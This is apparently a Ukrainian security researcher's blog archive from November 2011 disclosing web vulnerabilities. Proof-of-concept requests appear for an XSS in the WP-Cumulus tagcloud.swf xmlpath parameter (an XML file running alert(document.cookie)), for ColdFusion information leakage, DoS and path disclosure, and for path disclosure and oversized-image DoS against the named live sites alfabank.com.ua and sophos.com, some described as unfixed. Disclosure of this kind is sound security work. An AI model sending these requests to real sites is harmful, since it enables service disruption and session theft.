Архів для категорії 'Уразливості'

Добірка уразливостей

17:37 18.11.2011

В даній добірці уразливості в веб додатках:

Нова XSS уразливість в WP-Cumulus для WordPress та мільйонах сайтів

23:50 17.11.2011

Раніше я вже писав про XSS уразливість в WP-Cumulus для WordPress та багатьох інших плагінах (а також віджетах і темах) для різних движків, що використовують tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

В листопаді, 09.11.2011 (через три роки після оприлюднення попередньої уразливості), я знайшов нову Cross-Site Scripting уразливість в WP-Cumulus для WordPress. Знайшов її на одному е-комерс сайті. Що також має місце в багатьох інших веб додатках та мільйонах сайтів. Про що найближчим часом повідомлю розробнику WP-Cumulus. Якщо попередня уразливість стосувалася параметра mode, то нова - параметра xmlpath.

XSS:

http://site/tagcloud.swf?xmlpath=xss.xml
http://site/tagcloud.swf?xmlpath=http://site/xss.xml

Файл xss.xml:

<tags>
<a href="javascript:alert(document.cookie)" style="font-size:+40pt">Click me</a>
<a href="http://websecurity.com.ua" style="font-size:+40pt">Click me</a>
</tags>

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Атака спрацює лише у нових версіях флешки, де додали підтримку параметра xmlpath. В старих версіях (невразливих) в контекстному меню вказано “WP-Cumulus by Roy Tanck”, а в нових версіях (вразливих) вказано “WP-Cumulus by Roy Tanck and Luke Morton”. Атака спрацює лише коли xml-файл розміщений на цьому самому сайті (шлях може бути вказаний як відносний, так і абсолютний). Розширення файла може бути довільне.

При цьому патч Роя (версія флешки для WP-Cumulus 1.23) спрацьовує і для даної уразливості, тому в пропатчених версіях флешки XSS вже не спрацює, тільки HTML Injection.

Уразливі всі версії WP-Cumulus для WordPress. Та повинні бути уразливими Joomulus для Joomla, JVClouds3D для Joomla, Blogumus, 3D Cloud для Joomla, Tagcloud для DLE, t3m_cumulus_tagcloud для TYPO3, Cumulus для BlogEngine.NET, tagcloud для Kasseler CMS, 3D user cloud для Joomla, Flash Tag Cloud для Blogsa та інших ASP.NET движків, b-cumulus, Cumulus для Drupal, sfWpCumulusPlugin для symfony, Flash Tag Cloud For MT 4, MT-Cumulus для Movable Type, Tumulus для Typepad, WP-Cumulus для RapidWeaver, HB-Cumulus для Habari, Cumulus для DasBlog, EZcumulus та eZ Flash Tag Cloud для eZ Publish, Simple Tags для Expression Engine (версія 1.6.3 і нові версії, де була додана підтримка даного swf-файла), Freetag для Serendipity (підтримка флеш-файла була додана в версії 2.103), Tag cloud для Social Web CMS, Animated tag cloud для PHP-Fusion, 3D Advanced Tags Clouds для Magento, Cumulus для Sweetcron та інші веб додатки з цією флешкою.

А також теми для движків, зокрема для Drupal, що використовують цю флешку (про п’ять вразливих тем до Drupal я писав раніше). Як я зазначив вище, вразливі лише веб додатки з новими версіями цього флеш-файла (і багато веб додатків та сайтів використовують саме нові версії флешки).

Добірка уразливостей

17:24 17.11.2011

В даній добірці уразливості в веб додатках:

  • Apple MobileSafari Attachment Viewing Cross Site Scripting Vulnerability (деталі)
  • XSS vulnerabilities in phpList (деталі)
  • XSRF (CSRF) in phpList (деталі)
  • ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams) (деталі)
  • XSS vulnerabilities in Noah’s Classifieds (деталі)
  • Double free vulnerability in libxml2 (деталі)
  • XSS in Max’s PHP Photo Album (деталі)
  • Double free vulnerability in libxml2 (деталі)
  • Path disclousure in yappa-ng Photo Gallery (деталі)
  • HP SiteScope, Cross Site Scripting (XSS) and HTML Injection (деталі)

Нові уразливості на www.alfabank.com.ua

23:55 16.11.2011

18.07.2011

У липні, 07.07.2010, я знайшов нові Cross-Site Scripting уразливості на http://www.alfabank.com.ua - сайті Альфа-Банка. Про що найближчим часом сповіщу адміністрацію сайта. Причому минулого літа я звертав увагу представників банку, що на даному сайті багато дірок, але вони так і не виправили їх (ні вищезгаданих дірок, ні попередніх) і не почали слідкувати за безпекою власних сайтів.

Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на alfabank.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

16.11.2011

XSS:

Всі сторінки сайта уразливі до XSS причому в будь-яких довільних параметрах. Це призводить до появи на кожній сторінці сайта довільного числа уразливостей (в довільному числі параметрів), хоч мільярда XSS дірок.

Тобто це “нескінченні дірки”, які ще й знаходиться на всіх сторінках сайта. Про дірки, які поширені на весь сайт, я вже писав в статті Уразливості, що мають місце на всьому сайті, а в даному випадку це поєднання цих двох типів уразливостей.

Дані уразливості досі не виправлені.

Добірка уразливостей

17:20 16.11.2011

В даній добірці уразливості в веб додатках:

  • Directory Traversal Vulnerability in Cisco Network Admission Control Manager (деталі)
  • Request Tracker security update (деталі)
  • Multiple XSS in ZENphoto (деталі)
  • Multiple Vulnerabilities in Cisco Firewall Services Module (деталі)
  • SQL injection in 4images (деталі)
  • Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module (деталі)
  • Multiple Path disclousure in 4images (деталі)
  • Path disclousure in ZENphoto (деталі)
  • Multiple G-WAN vulnerabilities (деталі)
  • XSS in Webmin 1.540 + exploit for privilege escalation (деталі)

Уразливості на www.alfabank.com.ua

23:55 15.11.2011

13.07.2011

У липні, 07.07.2010, я знайшов Full path disclosure та Cross-Site Scripting уразливості на http://www.alfabank.com.ua - сайті Альфа-Банка. Про що найближчим часом сповіщу адміністрацію сайта. Причому минулого літа я звертав увагу представників банку, що на даному сайті багато дірок, але вони так і не виправили їх (ні вищезгаданих дірок, ні інших) і не почали слідкувати за безпекою власних сайтів.

Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на www.vab.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

15.11.2011

Full path disclosure:

http://www.alfabank.com.ua/ukr/vacancy/9/183/1

http://www.alfabank.com.ua/inc/vacancy.inc.php

XSS:

Окрім параметра query також уразливі будь-які параметри в пошуковому скрипті. Це призводить до появи на сайті довільного числа уразливостей (в довільному числі параметрів), хоч мільярда XSS дірок.

Якщо FPD вже виправлені, то XSS уразливості досі не виправлені.

Добірка уразливостей

17:25 15.11.2011

В даній добірці уразливості в веб додатках:

IL, DoS та FPD уразливості в Adobe ColdFusion

23:54 14.11.2011

21.09.2011

У червні, 30.06.2011, я знайшов нові уразливості в Adobe ColdFusion, зокрема Information Leakage, Denial of Service та Full path disclosure. Які я виявив на багатьох сайтах, що використовують ColdFusion. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про XSS та FPD уразливості в Adobe ColdFusion.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

14.11.2011

Information Leakage:

http://site/CFIDE/componentutils/packagelist.cfm

Витік списку всіх компонентів встановлених на сервері та шляхів до них.

DoS:

http://site/CFIDE/componentutils/packagelist.cfm?refreshCache=yes

При даному запиті відбувається оновлення кешу компонентів, що призводить до навантаження на сервер, якщо встановлена велика кількість компонентів.

Full path disclosure:

http://site/CFIDE/adminapi/_datasource/formatjdbcurl.cfm
http://site/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm
http://site/CFIDE/adminapi/_datasource/geturldefaults.cfm
http://site/CFIDE/adminapi/_datasource/setdsn.cfm
http://site/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm
http://site/CFIDE/adminapi/_datasource/setsldatasource.cfm
http://site/CFIDE/adminapi/customtags/l10n.cfm
http://site/CFIDE/debug/cf_debugFr.cfm (в тілі сторінки з фреймами)

В адмінці ColdFusion є ще багато FPD.

Уразливі Adobe ColdFusion 9 та попередні версії.

Добірка уразливостей

17:29 14.11.2011

В даній добірці уразливості в веб додатках:

  • NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF (деталі)
  • Arbitrary Command Execution in phpAlbum.net (деталі)
  • HP-UX running VEA, Remote Denial of Service (DoS), Execution of Arbitrary Code (деталі)
  • The BodgeIt Store - another vulnerable web app (деталі)
  • Security Advisories Relating to Symantec Products - Symantec Backup Exec Man-in-The-Middle (деталі)
  • Ocomon Multiple SQL Injection (деталі)
  • Barracuda Backup v2.0 - Multiple Web Vulnerabilities (деталі)
  • XSS in Dalbum (деталі)
  • Mutt vulnerability (деталі)
  • Multiple XSS in webSPELL (деталі)

Численні уразливості на www.sophos.com

23:55 05.11.2011

30.06.2011

Учора, 29.06.2011, я знайшов численні Denial of Service уразливості на http://www.sophos.com - сайті секюріті компанії Sophos. Що є відомим виробником антивірусних і антиспам продуктів. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.sophos.com. Ця антивірусна компанія не дуже слідкує за безпекою власного сайта.

Детальна інформація про уразливість з’явиться пізніше.

06.11.2011

DoS:

http://www.sophos.com/medialibrary/Images/Content/News%20and%20Trends/Security%20Hubs/Hot%20Topics/trjan11toptencountrieshostingmalware.ashx?w=10000&h=10000
http://www.sophos.com/medialibrary/Images/Content/News%20and%20Trends/Security%20Hubs/Hot%20Topics/enterprise-review/cascadia-labs-trendmicro10.ashx?w=10000&h=10000
http://www.sophos.com/medialibrary/Images/Content/News%20and%20Trends/Security%20Hubs/Hot%20Topics/enterprise-review/cascadia-labs-data-protection.ashx?w=10000&h=10000

Всього таких уразливостей біля 900 на сайті www.sophos.com (судячи по кількості ashx-скриптів в папці /medialibrary/Images/ по даним Google).

При відправці одного такого запиту сайт вже сильно навантажується, а якщо двох і більше запитів, то сайт взагалі підвисає на короткий час (поки сервер згенерує зображення).

Дані уразливості досі не виправлені. Що дуже несерйозно для секюріті компанії й це є типовим для Sophos.